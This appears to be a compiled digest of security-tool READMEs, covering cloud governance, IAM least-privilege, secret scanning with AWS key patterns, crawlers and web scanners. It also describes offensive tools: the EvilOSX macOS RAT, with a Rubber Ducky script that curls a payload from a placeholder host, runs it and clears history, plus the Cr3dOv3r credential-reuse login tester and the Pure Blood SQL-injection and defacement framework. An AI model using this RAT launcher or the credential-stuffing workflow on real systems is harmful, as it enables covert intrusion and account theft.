
Cloud Custodian - Rules Engine For Cloud Security, Cost Optimization, And Governance, DSL In Yaml For Policies To Query, Filter, And Take Actions On Resources


Cloud Custodian is a rules engine for AWS fleet management. It allows users to define policies to enable a well-managed cloud infrastructure that is both secure and cost-optimized. It consolidates many of the ad-hoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
Custodian can be used to manage AWS accounts by ensuring real-time compliance with security policies (like encryption and access requirements), tag policies, and cost management via garbage collection of unused resources and off-hours resource management.
Custodian policies are written in simple YAML configuration files that let users specify policies on a resource type (EC2, ASG, Redshift, etc.) and are constructed from a vocabulary of filters and actions.
It integrates with AWS Lambda and AWS CloudWatch Events to provide real-time enforcement of policies, with built-in provisioning of the Lambdas, or it can run as a simple cron job on a server to execute against large existing fleets.


Features
  • Comprehensive support for AWS services and resources (> 100), along with 400+ actions and 300+ filters to build policies with.
  • Supports arbitrary filtering on resources with nested boolean conditions.
  • Dry run any policy to see what it would do.
  • Automatically provisions AWS Lambda functions, AWS Config rules, and CloudWatch Events targets for real-time policies.
  • AWS CloudWatch metrics output on resources that matched a policy.
  • Structured outputs into S3 of which resources matched a policy.
  • Intelligent cache usage to minimize API calls.
  • Battle-tested - in production on some very large AWS accounts.
  • Supports cross-account usage via STS role assumption.
  • Supports integration with custom/user supplied Lambdas as actions.
  • Supports both Python 2.7 and Python 3.6 (beta) Lambda runtimes


Quick Install
$ virtualenv --python=python2 custodian
$ source custodian/bin/activate
(custodian) $ pip install c7n

Usage
First, a policy file needs to be created in YAML format. For example:
policies:
- name: remediate-extant-keys
  description: |
    Scan through all s3 buckets in an account and ensure all objects
    are encrypted (default to AES256).
  resource: s3
  actions:
    - encrypt-keys

- name: ec2-require-non-public-and-encrypted-volumes
  resource: ec2
  description: |
    Provision a lambda and cloud watch event target
    that looks at all new instances and terminates those with
    unencrypted volumes.
  mode:
    type: cloudtrail
    events:
      - RunInstances
  filters:
    - type: ebs
      key: Encrypted
      value: false
  actions:
    - terminate

- name: tag-compliance
  resource: ec2
  description: |
    Schedule a resource that does not meet tag compliance policies
    to be stopped in four days.
  filters:
    - State.Name: running
    - "tag:Environment": absent
    - "tag:AppId": absent
    - or:
      - "tag:OwnerContact": absent
      - "tag:DeptID": absent
  actions:
    - type: mark-for-op
      op: stop
      days: 4
Given that, you can run Cloud Custodian with:
# Validate the configuration (note this happens by default on run)
$ custodian validate policy.yml

# Dryrun on the policies (no actions executed) to see what resources
# match each policy.
$ custodian run --dryrun -s out policy.yml

# Run the policy
$ custodian run -s out policy.yml
Custodian supports a few other useful subcommands and options, including outputs to S3, CloudWatch metrics, and STS role assumption. Policies go together like Lego bricks with actions and filters.
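For instance, here is a hedged sketch of sending outputs to S3 and summarizing a previous run as CSV (the bucket name is a placeholder, and flag spellings can vary between releases, so check custodian run --help and custodian report --help):
# Write structured policy output to an S3 bucket instead of a local directory
$ custodian run -s s3://my-custodian-bucket/policies policy.yml

# Summarize the matched resources from that run as CSV
$ custodian report -s s3://my-custodian-bucket/policies --format csv policy.yml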
Consult the documentation for additional information, or reach out on gitter.

Get Involved
Mailing List - https://groups.google.com/forum/#!forum/cloud-custodian
Gitter - https://gitter.im/capitalone/cloud-custodian

Additional Tools
The Custodian project also develops and maintains a suite of additional tools here https://github.com/capitalone/cloud-custodian/tree/master/tools:
  • Salactus - Scale-out S3 scanning.
  • Mailer - A reference implementation for sending notification messages to users.
  • TrailDB - CloudTrail indexing and time-series generation for dashboarding.
  • LogExporter - CloudWatch Logs export to S3.
  • Index - Indexing of Custodian metrics and outputs for dashboarding.
  • Sentry - Log parsing for Python tracebacks to integrate with https://sentry.io/welcome/



NETworkManager - A Powerful Tool For Managing Networks And Troubleshooting Network Problems


A powerful tool for managing networks and troubleshooting network problems!

Features
  • Network Interface - Information, Configure
  • IP-Scanner
  • Port-Scanner
  • Ping
  • Traceroute
  • DNS Lookup
  • Remote Desktop
  • PuTTY
  • SNMP - Get, Walk, Set (v1, v2c, v3)
  • Wake on LAN
  • HTTP Headers
  • Subnet Calculator - Calculator, Subnetting, Supernetting
  • Lookup - OUI, Port
  • Connections
  • Listeners
  • ARP Table

Languages
  • English
  • German
  • Russian

System requirements

Repokid - AWS Least Privilege For Distributed, High-Velocity Deployment


Repokid uses Access Advisor provided by Aardvark to remove permissions granting access to unused services from the inline policies of IAM roles in an AWS account.

Getting Started

Install
mkvirtualenv repokid
git clone git@github.com:Netflix/repokid.git
cd repokid
python setup.py develop
repokid config config.json

DynamoDB
You will need a DynamoDB table called repokid_roles (specify account and endpoint in dynamo_db in config file).
The table should have the following properties:
  • RoleId (string) as the primary partition key, with no primary sort key
  • A global secondary index named Account with a primary partition key of Account, and RoleId and Account as projected attributes
  • A global secondary index named RoleName with a primary partition key of RoleName, and RoleId and RoleName as projected attributes
For development, you can run dynamo locally.
To run locally: java -Djava.library.path=./DynamoDBLocal_lib -jar DynamoDBLocal.jar -sharedDb -inMemory -port 8010
If you run the development version the table and index will be created for you automatically.
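For reference, here is a hedged sketch of creating that table against the local endpoint with the AWS CLI (the development version does this for you automatically; KEYS_ONLY projections are used here because the projected attributes listed above are all key attributes):
aws dynamodb create-table \
  --endpoint-url http://localhost:8010 \
  --table-name repokid_roles \
  --attribute-definitions \
      AttributeName=RoleId,AttributeType=S \
      AttributeName=Account,AttributeType=S \
      AttributeName=RoleName,AttributeType=S \
  --key-schema AttributeName=RoleId,KeyType=HASH \
  --global-secondary-indexes \
      'IndexName=Account,KeySchema=[{AttributeName=Account,KeyType=HASH}],Projection={ProjectionType=KEYS_ONLY},ProvisionedThroughput={ReadCapacityUnits=5,WriteCapacityUnits=5}' \
      'IndexName=RoleName,KeySchema=[{AttributeName=RoleName,KeyType=HASH}],Projection={ProjectionType=KEYS_ONLY},ProvisionedThroughput={ReadCapacityUnits=5,WriteCapacityUnits=5}' \
  --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5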

IAM Permissions:
Repokid needs an IAM Role in each account that will be queried. Additionally, Repokid needs to be launched with a role or user which can sts:AssumeRole into the different account roles.
RepokidInstanceProfile:
  • Only create one.
  • Needs the ability to call sts:AssumeRole into all of the RepokidRoles.
  • DynamoDB permissions for the repokid_roles table and all indexes (specified in the assume_role subsection of dynamo_db in the config) and the ability to run dynamodb:ListTables
RepokidRole:
  • Must exist in every account to be managed by repokid.
  • Must have a trust policy allowing RepokidInstanceProfile.
  • Name must be specified in connection_iam in config file.
  • Has these permissions:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Action": [
        "iam:DeleteInstanceProfile",
        "iam:DeleteRole",
        "iam:DeleteRolePolicy",
        "iam:GetInstanceProfile",
        "iam:GetRole",
        "iam:GetRolePolicy",
        "iam:ListInstanceProfiles",
        "iam:ListInstanceProfilesForRole",
        "iam:ListRolePolicies",
        "iam:ListRoles",
        "iam:PutRolePolicy",
        "iam:UpdateRoleDescription"
      ],
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}
So if you are monitoring n accounts, you will always need n+1 roles (n RepokidRoles and 1 RepokidInstanceProfile).

Editing config.json
Running repokid config config.json creates a file that you will need to edit. Find and update these fields:
  • dynamodb: If using dynamo locally, set the endpoint to http://localhost:8010. If using AWS hosted dynamo, set the region, assume_role, and account_number.
  • aardvark_api_location: The location to your Aardvark REST API. Something like https://aardvark.yourcompany.net/api/1/advisors
  • connection_iam: Set assume_role to RepokidRole, or whatever you have called it.

Optional Config
Repokid uses filters to decide which roles are candidates to be repoed. Filters may be configured to suit your environment as described below.

Blacklist Filter
Roles may be excluded by adding them to the Blacklist filter. One common reason to exclude a role is if the corresponding workload performs occasional actions that may not have been observed but are known to be required. There are two ways to exclude a role:
  • Exclude role name for all accounts: add it to a list in the config filter_config.BlacklistFilter.all
  • Exclude role name for specific account: add it to a list in the config filter_config.BlacklistFilter.<ACCOUNT_NUMBER>
Blacklists can also be maintained in an S3 blacklist file. They should be in the following form:
{
  "arns": ["arn1", "arn2"],
  "names": {"role_name_1": ["all", "account_number_1"], "role_name_2": ["account_number_2", "account_number_3"]}
}

Age Filter
By default the age filter excludes roles that are younger than 90 days. To change this, edit the config setting filter_config.AgeFilter.minimum_age.

Active Filters
New filters can be created to support internal logic. At Netflix we have several that are specific to our use cases. To make them active make sure they are in the Python path and add them in the config to the list in the section active_filters.

How to Use
Once Repokid is configured, use it as follows:

Standard flow
  • Update role cache: repokid update_role_cache <ACCOUNT_NUMBER>
  • Display role cache: repokid display_role_cache <ACCOUNT_NUMBER>
  • Display information about a specific role: repokid display_role <ACCOUNT_NUMBER> <ROLE_NAME>
  • Repo a specific role: repokid repo_role <ACCOUNT_NUMBER> <ROLE_NAME>
  • Repo all roles in an account: repokid repo_all_roles <ACCOUNT_NUMBER> -c

Scheduling
Rather than running a repo right now, you can schedule one (the schedule_repo command). The duration between scheduling and eligibility is configurable, but by default roles can be repoed 7 days after scheduling. You can then run the repo_scheduled_roles command to only repo roles which have already been scheduled.
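A hedged sketch of that flow; the argument forms, and the -c commit flag, are assumed here by analogy with the commands above (check repokid --help):
repokid schedule_repo <ACCOUNT_NUMBER>
# ...wait for the eligibility window (7 days by default)...
repokid repo_scheduled_roles <ACCOUNT_NUMBER> -c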

Rolling back
Repokid stores a copy of each version of inline policies it knows about. These are added when a different version of a policy is found during update_role_cache and any time a repo action occurs. To restore a previous version run:
See all versions of a role: repokid rollback_role <ACCOUNT_NUMBER> <ROLE_NAME>
Restore a specific version: repokid rollback_role <ACCOUNT_NUMBER> <ROLE_NAME> --selection=<NUMBER> -c

Stats
Repokid keeps counts of the total permissions for each role. Stats are added any time an update_role_cache or repo_role action occurs. To output all stats to a CSV file, run: repokid repo_stats <OUTPUT_FILENAME>. An optional account number can be specified to output stats for a specific account only.

Dispatcher
Repokid Dispatcher is designed to listen for messages on a queue and perform actions. So far the actions are:
  • List repoable services from a role
  • Set or remove an opt-out
  • List and perform rollbacks for a role
Repokid will respond on a configurable SNS topic with information about any successes or failures. The Dispatcher component exists to help operationalize the repo lifecycle across your organization. You may choose to expose the queue directly to developers, but more likely this should be guarded because rolling back can be a destructive action if not done carefully.


Git-Secrets - Prevents You From Committing Secrets And Credentials Into Git Repositories


Prevents you from committing passwords and other sensitive information to a git repository.

Synopsis
git secrets --scan [-r|--recursive] [--cached] [--no-index] [--untracked] [<files>...]
git secrets --scan-history
git secrets --install [-f|--force] [<target-directory>]
git secrets --list [--global]
git secrets --add [-a|--allowed] [-l|--literal] [--global] <pattern>
git secrets --add-provider [--global] <command> [arguments...]
git secrets --register-aws [--global]
git secrets --aws-provider [<credentials-file>]


Description
git-secrets scans commits, commit messages, and --no-ff merges to prevent adding secrets into your git repositories. If a commit, commit message, or any commit in a --no-ff merge history matches one of your configured prohibited regular expression patterns, then the commit is rejected.

Installing git-secrets
git-secrets must be placed somewhere in your PATH so that it is picked up by git when running git secrets. You can use the install target of the provided Makefile to install git secrets and the man page. You can customize the install path using the PREFIX and MANPREFIX variables.
make install
Or, installing with Homebrew (for OS X users).
brew install git-secrets
Warning
You're not done yet! You MUST install the git hooks for every repo that you wish to use with git secrets --install.
Here's a quick example of how to ensure a git repository is scanned for secrets on each commit:
cd /path/to/my/repo
git secrets --install
git secrets --register-aws


Options

Operation Modes
Each of these options must appear first on the command line.
--install
Installs hooks for a repository. Once the hooks are installed for a git repository, commits and non-ff merges for that repository will be prevented from committing secrets.
--scan
Scans one or more files for secrets. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched. If no files are provided, all files returned by git ls-files are scanned.
--scan-history
Scans repository including all revisions. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched.
--list
Lists the git-secrets configuration for the current repo or in the global git config.
--add
Adds a prohibited or allowed pattern.
--add-provider
Registers a secret provider. Secret providers are executables that, when invoked, output patterns that git-secrets should treat as prohibited.
--register-aws
Adds common AWS patterns to the git config and ensures that keys present in ~/.aws/credentials are not found in any commit. The following checks are added:
  • AWS Access Key ID via [A-Z0-9]{20}
  • AWS Secret Access Key assignments via ":" or "=" surrounded by optional quotes
  • AWS account ID assignments via ":" or "=" surrounded by optional quotes
  • Allowed patterns for example AWS keys (AKIAIOSFODNN7EXAMPLE and wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)
  • Enables using ~/.aws/credentials to scan for known credentials.
Note
While the patterns registered by this command should catch most instances of AWS credentials, these patterns are not guaranteed to catch them all. git-secrets should be used as an extra means of insurance -- you still need to do your due diligence to ensure that you do not commit credentials to a repository.
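To see exactly what was added, you can register the patterns and then list the resulting configuration:
git secrets --register-aws
git secrets --list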
--aws-provider
Secret provider that outputs credentials found in an INI file. You can optionally provide the path to an ini file.

Options for --install
-f, --force
Overwrites existing hooks if present.
<target-directory>
When provided, installs git hooks to the given directory. The current directory is assumed if <target-directory> is not provided.
If the provided <target-directory> is not in a Git repository, the directory will be created and hooks will be placed in <target-directory>/hooks. This can be useful for creating Git template directories for use with git init --template <target-directory>.
You can run git init on a repository that has already been initialized. From the git init documentation:
Running git init in an existing repository is safe. It will not overwrite things that are already there. The primary reason for rerunning git init is to pick up newly added templates (or to move the repository to another place if --separate-git-dir is given).
The following git hooks are installed:
  1. pre-commit: Used to check if any of the files changed in the commit use prohibited patterns.
  2. commit-msg: Used to determine if a commit message contains a prohibited pattern.
  3. prepare-commit-msg: Used to determine if a merge commit will introduce a history that contains a prohibited pattern at any point. Please note that this hook is only invoked for non fast-forward merges.
Note
Git only allows a single script to be executed per hook. If the repository contains Debian style subdirectories like pre-commit.d and commit-msg.d, then the git hooks will be installed into these directories, which assumes that you've configured the corresponding hooks to execute all of the scripts found in these directories. If these git subdirectories are not present, then the git hooks will be installed to the git repo's .git/hooks directory.

Examples
Install git hooks to the current directory:
cd /path/to/my/repository
git secrets --install
Install git hooks to a repository other than the current directory:
git secrets --install /path/to/my/repository
Create a git template that has git-secrets installed, and then copy that template into a git repository:
git secrets --install ~/.git-templates/git-secrets
git init --template ~/.git-templates/git-secrets
Overwrite existing hooks if present:
git secrets --install -f

Options for --scan
-r, --recursive
Scans the given files recursively. If a directory is encountered, the directory will be scanned. If -r is not provided, directories will be ignored.
-r cannot be used alongside --cached, --no-index, or --untracked.
--cached
Searches blobs registered in the index file.
--no-index
Searches files in the current directory that are not managed by Git.
--untracked
In addition to searching the tracked files in the working tree, --scan also searches untracked files.
<files>...
The path to one or more files on disk to scan for secrets.
If no files are provided, all files returned by git ls-files are scanned.

Examples
Scan all files in the repo:
git secrets --scan
Scans a single file for secrets:
git secrets --scan /path/to/file
Scans a directory recursively for secrets:
git secrets --scan -r /path/to/directory
Scans multiple files for secrets:
git secrets --scan /path/to/file /path/to/other/file
You can scan by globbing:
git secrets --scan /path/to/directory/*
Scan from stdin:
echo 'hello!' | git secrets --scan -

Options for --list
--global
Lists only git-secrets configuration in the global git config.

Options for --add
--global
Adds patterns to the global git config
-l, --literal
Escapes special regular expression characters in the provided pattern so that the pattern is searched for literally.
-a, --allowed
Mark the pattern as allowed instead of prohibited. Allowed patterns are used to filter out false positives.
<pattern>
The regex pattern to search.

Examples
Adds a prohibited pattern to the current repo:
git secrets --add '[A-Z0-9]{20}'
Adds a prohibited pattern to the global git config:
git secrets --add --global '[A-Z0-9]{20}'
Adds a string that is scanned for literally (+ is escaped):
git secrets --add --literal 'foo+bar'
Add an allowed pattern:
git secrets --add -a 'allowed pattern'

Options for --register-aws
--global
Adds AWS specific configuration variables to the global git config.

Options for --aws-provider
[<credentials-file>]
If provided, specifies the custom path to an INI file to scan. If not provided, ~/.aws/credentials is assumed.

Options for --add-provider
--global
Adds the provider to the global git config.
<command>
Provider command to invoke. When invoked the command is expected to write prohibited patterns separated by new lines to stdout. Any extra arguments provided are passed on to the command.

Examples
Registers a secret provider with arguments:
git secrets --add-provider -- git secrets --aws-provider
Cats secrets out of a file:
git secrets --add-provider -- cat /path/to/secret/file/patterns


Defining prohibited patterns
egrep compatible regular expressions are used to determine if a commit or commit message contains any prohibited patterns. These regular expressions are defined using the git config command. It is important to note that different systems use different versions of egrep. For example, when running on OS X, you will use a different version of egrep than when running on something like Ubuntu (BSD vs GNU).
You can add prohibited regular expression patterns to your git config using git secrets --add <pattern>.
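For example, after adding a pattern you can read it back out of the git config (the same keys referenced in the error output further below):
git secrets --add '[A-Z0-9]{20}'
git config --get-all secrets.patterns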


Ignoring false-positives
Sometimes a regular expression might match false positives. For example, git commit SHAs look a lot like AWS access keys. You can specify many different regular expression patterns as false positives using the following command:
git secrets --add --allowed 'my regex pattern'
You can also add regular expression patterns to filter false positives to a .gitallowed file located in the repository's root directory. Lines starting with # are skipped (comment lines), and empty lines are also skipped.
First, git-secrets will extract all lines from a file that contain a prohibited match. Included in the matched results will be the full path to the file that was matched, followed by ':', followed by the line number that was matched, followed by the entire line from the file that was matched by a secret pattern. Then, if you've defined allowed regular expressions, git-secrets will check to see if all of the matched lines match at least one of your registered allowed regular expressions. If all of the lines that were flagged as secrets are canceled out by an allowed match, then the subject text does not contain any secrets. If any of the matched lines are not matched by an allowed regular expression, then git-secrets will fail the commit/merge/message.
Important
Just as it is a bad practice to add prohibited patterns that are too greedy, it is also a bad practice to add allowed patterns that are too forgiving. Be sure to test out your patterns using ad-hoc calls to git secrets --scan $filename to ensure they are working as intended.


Secret providers
Sometimes you want to check for an exact pattern match against a set of known secrets. For example, you might want to ensure that no credentials present in ~/.aws/credentials ever show up in a commit. In these cases, it's better to leave these secrets in one location rather than spread them out across git repositories in git configs. You can use "secret providers" to fetch these types of credentials. A secret provider is an executable that when invoked outputs prohibited patterns separated by new lines.
You can add secret providers using the --add-provider command:
git secrets --add-provider -- git secrets --aws-provider
Notice the use of --. This ensures that any arguments associated with the provider are passed to the provider each time it is invoked when scanning for secrets.


Example walkthrough
Let's take a look at an example. Given the following subject text (stored in /tmp/example):
This is a test!
password=ex@mplepassword
password=******
More test...
And the following registered patterns:
git secrets --add 'password\s*=\s*.+'
git secrets --add --allowed --literal 'ex@mplepassword'
Running git secrets --scan /tmp/example will produce the following error output:
/tmp/example:3:password=******

[ERROR] Matched prohibited pattern

Possible mitigations:
- Mark false positives as allowed using: git config --add secrets.allowed ...
- List your configured patterns: git config --get-all secrets.patterns
- List your configured allowed patterns: git config --get-all secrets.allowed
- Use --no-verify if this is a one-time false positive
Breaking this down, the prohibited pattern value of password\s*=\s*.+ will match the following lines:
/tmp/example:2:password=ex@mplepassword
/tmp/example:3:password=******
...But the first match will be filtered out because it matches the allowed regular expression of ex@mplepassword. Because there is still a remaining line that did not match an allowed pattern, it is considered a secret.
Because matching lines are reported with the filename and line number prepended (e.g., /tmp/example:3:...), you can create allowed patterns that take filenames and line numbers into account in the regular expression. For example, you could whitelist an entire file using something like:
git secrets --add --allowed '/tmp/example:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0
Alternatively, you could whitelist a specific line number of a file if that line is unlikely to change using something like the following:
git secrets --add --allowed '/tmp/example:3:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0
Keep this in mind when creating allowed patterns to ensure that your allowed patterns are not inadvertently matched because the filename is included in the subject text that allowed patterns are matched against.


Skipping validation
Use the --no-verify option in the event of a false-positive match in a commit, merge, or commit message. This will skip the execution of the git hook and allow you to make the commit or merge.
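For example, to make a single commit without running the installed hooks:
git commit --no-verify -m "commit that was falsely flagged"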



Cred Scanner - A Simple File-Based Scanner To Look For Potential AWS Access And Secret Keys In Files


A simple command line tool for finding AWS credentials in files. Optimized for use with Jenkins and other CI systems.
I suspect there are other, better tools out there (such as git-secrets), but I couldn't find anything to run a quick and dirty scan that also integrates well with Jenkins.

Usage:
To install just copy it where you want it and install the requirements:
pip install -r ./requirements.txt
This was written in Python 3.6.
To run:
python cred_scanner.py 
That will scan the local directory and all subdirectories. It will list the files, which ones have potential access keys, and which files can't be scanned due to the file format. cred_scanner exits with a code of 1 if it finds any potential keys.
Usage: cred_scanner.py [OPTIONS]

Options:
--path TEXT Path other than the local directory to scan
--secret Also look for Secret Key patterns. This may result in many
false matches due to the nature of secret keys.
--help Show this message and exit.
To run as a test in Jenkins just use the command line or add it as a step to your Jenkins build. Jenkins will automatically fail the build if it sees the exit code 1.
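For example, a hedged invocation for a CI job that scans a checked-out workspace and also checks for secret key patterns (the path is a placeholder):
python cred_scanner.py --path /path/to/workspace --secret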


Cr3dOv3r v0.4 - Know The Dangers Of Credential Reuse Attacks


Your best friend in credential reuse attacks.
You give Cr3dOv3r an email then it does two simple useful jobs with it:
  • Search for public leaks for the email and return the result with the most useful details about the leak (using the haveibeenpwned API), and try to get the plain text passwords from the leaks it finds (using @GhostProjectME).
  • Then you give it a password (or a leaked password) and it tries these credentials against some well-known websites (e.g. Facebook, Twitter, Google) and tells you if the login is successful.

Some of the scenarios Cr3dOv3r can be used in
  • Check if the targeted email is in any leaks and then use the leaked password to check it against the websites.
  • Check if the target credentials you found are reused on other websites/services.
  • Check if the old password you got from the target/leaks is still used on any website.

Screenshots



Usage
usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email

positional arguments:
email Email/username to check

optional arguments:
-h, --help show this help message and exit
-p Don't check for leaks or plain text passwords.
-np Don't check for plain text passwords.
-q Quiet mode (no banner).

Installing and requirements

To make the tool work at its best you must have :
  • Python 3.x or 2.x (3 preferred).
  • A Linux or Windows system.
  • It has also worked on some machines running macOS with Python 3.
  • The requirements mentioned in the next few lines.

Installing
+For Windows: (after downloading the ZIP and unzipping it)
cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -h
+For Linux :
git clone https://github.com/D4Vinci/Cr3dOv3r.git
cd Cr3dOv3r
python3 -m pip install -r requirements.txt
python3 Cr3dOv3r.py -h
+For docker :
git clone https://github.com/D4Vinci/Cr3dOv3r.git
docker build -t cr3dov3r Cr3dOv3r/
docker run -it cr3dov3r "example@gmail.com"
If you want to add a website to the tool, follow the instructions in the wiki

Contact

EvilOSX - An Evil RAT (Remote Administration Tool) For macOS/OS X


An evil RAT (Remote Administration Tool) for macOS / OS X.

Features
  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

Normal users
The server side requires python3 to run.
The bot side is written in python2 which is already installed on macOS / OS X.

Once python3 is installed, open a terminal and type the following:
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Start listening for connections
$ python3 start.py

# Lastly, run the built launcher (see the builder tab) on your target(s)
Warning: Because payloads are created uniquely for the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users
There is also a command line interface for those who want to use this over SSH:
# Create a launcher to infect your target(s)
$ python3 builder.py

# Start listening for connections
$ python3 start.py --cli --port 1337

# Lastly, run the built launcher on your target(s)

Screenshots



Motivation
This project was created to be used with a USB Rubber Ducky; here's the simple script:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • "Termina" is spelled that way intentionally; on some systems Spotlight won't find the Terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.


Photon - Incredibly Fast Crawler Which Extracts Urls, Emails, Files, Website Accounts And Much More


Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

Yep, you can use 100 threads and Photon won't complain about it, because it's in Ninja Mode.

Why Photon?

Not Your Regular Crawler
Crawlers are supposed to recursively extract links, right? Well, that's kind of boring, so Photon goes beyond that. It extracts the following information:
  • URLs (in-scope & out-of-scope)
  • URLs with parameters (example.com/gallery.php?id=2)
  • Intel (emails, social media accounts, amazon buckets etc.)
  • Files (pdf, png, xml etc.)
  • JavaScript files & Endpoints present in them
  • Strings based on custom regex pattern
The extracted information is saved in an organized manner.



Intelligent Multi-Threading
Here's a secret: most of the tools floating around on the internet aren't properly multi-threaded, even if they claim to be. They either supply a list of items to threads, which results in multiple threads accessing the same item, or they simply put a thread lock on everything and end up rendering multi-threading useless.
But Photon is different, or should I say "genius"? Take a look at this and decide for yourself.

Ninja Mode
In Ninja Mode, 3 online services are used to make requests to the target on your behalf.
So basically, now you have 4 clients making requests to the same server simultaneously which gives you a speed boost, minimizes the risk of connection reset as well as delays requests from a single client.
Here's a comparison generated by Quark where the lines represent threads:


Usage


-u --url
Run Photon against a single website.
python photon.py -u http://example.com

Specifying a URL with its schema, i.e. http(s)://, is optional, but you must add www. if the website uses it.
Tip: If you feel like the crawling is taking too long or you just don't want to crawl anymore, just press ctrl + c in your terminal and Photon will skip the rest of the URLs.


-l --level
Depth of crawling.
python photon.py -u http://example.com -l 3

Default Value:
2



-d --delay
You can keep a delay between requests made to the target by specifying the time in seconds.
python photon.py -u http://example.com -d 1

Default Value:
0



-t --threads
Number of threads to use.
python photon.py -u http://example.com -t 10

Default Value:
2

Tip: The optimal number of threads depends on your connection speed as well as nature of the target server. If you have a decent network connection and the server doesn't have any rate limiting in place, you can use up to 100 threads.


-c --cookie
Cookie to send.
python photon.py -u http://example.com -c "PHPSSID=821b32d21"



-n --ninja
Toggles Ninja Mode on/off.
python photon.py -u http://example.com --ninja

Default Value:
False

Tip: Ninja mode uses the following websites to make requests on your behalf:
Please help me add more "APIs" to reduce load on their servers and turn off this mode whenever not required.


--dns
Create an image displaying target domain's DNS data.
python photon.py -u http://example.com --dns

Sample Output:


Tip: It doesn't work with subdomains. This plugin is in development and this issue will be fixed in a day or two.


-s --seeds
Lets you add custom seeds, separated by commas.
python photon.py -u http://example.com -s "http://example.com/portals.html,http://example.com/blog/2018"



-r --regex
Specify custom regex pattern to extract strings.
python photon.py -u http://example.com -r "\d{10}"

The strings extracted using the custom regex pattern are saved in custom.txt.



FF Password Exporter - Easily Export Your Passwords From Firefox


It can be difficult to export your passwords from Firefox. Since version 57 of Firefox (Quantum), existing password export add-ons no longer work, and Mozilla provides no other official alternatives. FF Password Exporter makes it quick and easy to export all of your passwords from Firefox. You can use FF Password Exporter on Windows, macOS, and Linux distributions.

How to Use
  1. Download and install/run FF Password Exporter. Use the links above.
  2. Choose the Firefox user's profile directory you want to export passwords from.
  3. If you have set a master password to protect your Firefox passwords, enter it.
  4. Choose your export format: CSV or JSON.
  5. Click the export button and save the file to your device.

Supported Firefox Versions
  • Firefox 58+ with key4.db profiles

Requirements
Run the app
npm install
npm run electron


Pure Blood v2.0 - A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter


A penetration testing framework created for hackers, pentesters, and bug hunters.

Web Pentest / Information Gathering:
  • Banner Grab
  • Whois
  • Traceroute
  • DNS Record
  • Reverse DNS Lookup
  • Zone Transfer Lookup
  • Port Scan
  • Admin Panel Scan
  • Subdomain Scan
  • CMS Identify
  • Reverse IP Lookup
  • Subnet Lookup
  • Extract Page Links
  • Directory Fuzz (NEW)
  • File Fuzz (NEW)
  • Shodan Search (NEW)
  • Shodan Host Lookup (NEW)

Web Application Attack: (NEW)
  • Wordpress
        | WPScan
        | WPScan Bruteforce
        | Wordpress Plugin Vulnerability Checker
            Features: // I will add more soon.
            | WordPress WooCommerce - Directory Traversal
            | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
            | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
            | WordPress Plugin Events Calendar - 'event_id' SQL Injection
  • Auto SQL Injection
        Features:
        | Union Based
        | (Error Output = False) Detection
        | Tested on 100+ Websites

Generator:
  • Deface Page
  • Password Generator // NEW
  • Text To Hash //NEW

Installation
Any Python Version.
$ git clone https://github.com/cr4shcod3/pureblood
$ cd pureblood
$ pip install -r requirements.txt

DEMO

Web Pentest
 

Web Application Attack
 

Build With

Authors


WAScan v0.2.1 - Web Application Scanner


WAScan ((W)eb (A)pplication (Scan)ner) is an open-source web application security scanner. It is designed to find various vulnerabilities using a "black-box" method: it won't study the source code of web applications but will work like a fuzzer, scanning the pages of the deployed web application, extracting links and forms, attacking the scripts, sending payloads, and looking for error messages, etc. WAScan is built on Python 2.7 and can run on any platform that has a Python environment.

Features
Fingerprint
  • Content Management System (CMS) -> 6
  • Web Frameworks -> 22
  • Cookies/Headers Security
  • Languages -> 9
  • Operating Systems (OS) -> 7
  • Server -> ALL
  • Web App Firewall (WAF) -> 50+
Attacks
  • Bash Commands Injection
  • Blind SQL Injection
  • Buffer Overflow
  • Carriage Return Line Feed
  • SQL Injection in Headers
  • XSS in Headers
  • HTML Injection
  • LDAP Injection
  • Local File Inclusion
  • OS Commanding
  • PHP Code Injection
  • SQL Injection
  • Server Side Injection
  • XPath Injection
  • Cross Site Scripting
  • XML External Entity
Audit
  • Apache Status Page
  • Open Redirect
  • PHPInfo
  • Robots.txt
  • XST
Bruteforce
  • Admin Panel
  • Common Backdoor
  • Common Backup Dir
  • Common Backup File
  • Common Dir
